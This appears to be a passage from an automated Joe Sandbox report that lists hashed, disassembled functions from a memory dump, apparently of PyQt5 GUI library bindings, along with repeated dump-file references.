                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setBoundingPicture@@Rect@Rect@@@
                                                                                                                                                                                                                                          • String ID: BJ9$QPicture$setBoundingRect$setBoundingRect(self, r: QRect)
                                                                                                                                                                                                                                          • API String ID: 2345466796-2038282140
                                                                                                                                                                                                                                          • Opcode ID: 2127798c431d714f199f14e366681d12e358c0a55805a5042f077a76d2e13ac3
                                                                                                                                                                                                                                          • Instruction ID: 5b1611d7143e1ac6c208ddccd9b2e7750a5d3e2d66242c1bde2ab8b73432910d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2127798c431d714f199f14e366681d12e358c0a55805a5042f077a76d2e13ac3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3711E636A19E46D1EB109F15E8896A933A5FB44FD4F914032DA8E03320EF3DE569C744
                                                                                                                                                                                                                                          Function 00007FF89D9A5DC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?type@Bool_Format@@FromLongText
                                                                                                                                                                                                                                          • String ID: QTextFormat$isListFormat$isListFormat(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 1807932774-1176197936
                                                                                                                                                                                                                                          • Opcode ID: 8ce7ffcb860e064197296368c241edf88cb2c6abdb4beb8bed427b08cf5ab7a9
                                                                                                                                                                                                                                          • Instruction ID: 1027c8ee1feb07d8b743b59aba9058ac9aabadcd306c8476099f30c4676fe626
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ce7ffcb860e064197296368c241edf88cb2c6abdb4beb8bed427b08cf5ab7a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8014037A09A46D6EF10CF61E8894A973E4FB44BD0B954432D99E47220EF78E5A9C348
                                                                                                                                                                                                                                          Function 00007FF89D9600E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setBlockFormat@QTextCursor@@QEAAXAEBVQTextBlockFormat@@@Z.QT5GUI ref: 00007FF89D960143
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BlockText$?setCursor@@Format@Format@@@
                                                                                                                                                                                                                                          • String ID: BJ9$QTextCursor$setBlockFormat$setBlockFormat(self, format: QTextBlockFormat)
                                                                                                                                                                                                                                          • API String ID: 2824883670-3426317795
                                                                                                                                                                                                                                          • Opcode ID: f9875d61abb51eb14a511625b5e7c6cd7a1748e73225f2acd8ac14943a0132de
                                                                                                                                                                                                                                          • Instruction ID: a349c69e9a339a063263c45bf78d29d3f39a35f76aa3dc07a0a09710e7c1425c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9875d61abb51eb14a511625b5e7c6cd7a1748e73225f2acd8ac14943a0132de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A511F576A18E46C1EB109F15E8896A933A5FB48FC4F914132DA9E07324EF3DE55AC304
                                                                                                                                                                                                                                          Function 00007FF89D934070 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?remove@Block@@@List@@
                                                                                                                                                                                                                                          • String ID: BJ9$QTextList$remove$remove(self, a0: QTextBlock)
                                                                                                                                                                                                                                          • API String ID: 4255931918-2132397891
                                                                                                                                                                                                                                          • Opcode ID: c2828cc1d25fc1f5f3752c5497427228a7080d422fdbb3adc6184925a87d68ba
                                                                                                                                                                                                                                          • Instruction ID: 346a64df8b592a7970fe38d854d01e0b4d185667a9624ce28397375c18d948f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2828cc1d25fc1f5f3752c5497427228a7080d422fdbb3adc6184925a87d68ba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E11E336A18E46D1EB109F15E8896A933E5FB58FD4F914132DA9E03320EF39E56AC704
                                                                                                                                                                                                                                          Function 00007FF89D9B4050 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?setFormat@Format@@@Object@@
                                                                                                                                                                                                                                          • String ID: BJ9$QTextFrame$setFrameFormat$setFrameFormat(self, aformat: QTextFrameFormat)
                                                                                                                                                                                                                                          • API String ID: 760775155-3067798299
                                                                                                                                                                                                                                          • Opcode ID: 325ac8385bd670796d8adf2026465da6fe5e21c439983ee377eb3ce463e77a58
                                                                                                                                                                                                                                          • Instruction ID: d6d167e75f1cebc83860c5d6b4c86fbf9236e9cbf7ed552faedae6a7fb924a8f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 325ac8385bd670796d8adf2026465da6fe5e21c439983ee377eb3ce463e77a58
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB112836A08E46D1EB108F11E8892A933A4FB48FD4F918132DA8E03320EF3DE559C304
                                                                                                                                                                                                                                          Function 00007FF89D96DF80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?type@Bool_Format@@FromLongText
                                                                                                                                                                                                                                          • String ID: QTextFrameFormat$isValid$isValid(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 1807932774-2682830596
                                                                                                                                                                                                                                          • Opcode ID: 8be7567d6aeaa8c82e197bf4ae38ff4995b56f0ffbe5621d844142ea3aeb76e2
                                                                                                                                                                                                                                          • Instruction ID: 22edbb24b3443b6a2a3520a6813d79280d071dcb977d3fbfd9d762351c8cabc7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8be7567d6aeaa8c82e197bf4ae38ff4995b56f0ffbe5621d844142ea3aeb76e2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C015277A08B46D6EB108F61E8894A833E4FB44BD1F954436D99E43320EF7CE5A9C348
                                                                                                                                                                                                                                          Function 00007FF89D9B9F20 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setExp@Exp@@@Validator@@
                                                                                                                                                                                                                                          • String ID: BJ9$QRegExpValidator$setRegExp$setRegExp(self, rx: QRegExp)
                                                                                                                                                                                                                                          • API String ID: 3356541571-3763716425
                                                                                                                                                                                                                                          • Opcode ID: 37da44a2e83e9dff6ed763b1fff7517bd5a533788049bfe57ef39d8f22ad346f
                                                                                                                                                                                                                                          • Instruction ID: 916047b85a6f3b0744b4f164aa43b7497c66d3c569a8d90b6f11551e6d9fbb5a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37da44a2e83e9dff6ed763b1fff7517bd5a533788049bfe57ef39d8f22ad346f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F811E636A18F46D1EB109F15E8896A933E5FB48F94F914032DA9E03320EF3DE959C304
                                                                                                                                                                                                                                          Function 00007FF89D9AFAB0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?swap@Region@@V1@@
                                                                                                                                                                                                                                          • String ID: BJ9$QPainterPath$swap$swap(self, other: QPainterPath)
                                                                                                                                                                                                                                          • API String ID: 2712419754-3530485660
                                                                                                                                                                                                                                          • Opcode ID: badba2366f75d6bc59dc7301b271fe8f695c2d23d2aa92159adf6a02234b4bdb
                                                                                                                                                                                                                                          • Instruction ID: d2920d96193e2c97200d77c5571e1eb6caabdacbdae567266d0bc588894ba080
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: badba2366f75d6bc59dc7301b271fe8f695c2d23d2aa92159adf6a02234b4bdb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C11F576A08E46D1EB10CF10E8896A933A5FB54B94F914032DA9E03320EF39E559C304
                                                                                                                                                                                                                                          Function 00007FF89D968050 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
